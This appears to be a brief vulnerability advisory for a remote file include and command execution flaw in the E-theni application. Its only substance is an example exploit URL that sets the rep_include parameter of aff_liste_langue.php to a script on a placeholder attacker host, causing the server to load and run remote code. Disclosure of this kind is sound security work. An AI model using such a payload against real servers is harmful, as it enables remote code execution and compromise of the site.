• info
• discussion
• exploit
• solution
• references

E-theni Remote Include Command Execution Vulnerability

The following example was provided:

http://www.example.com/admin_t/include/aff_liste_langue.php?rep_include=http://<attacker_site>/para_langue.php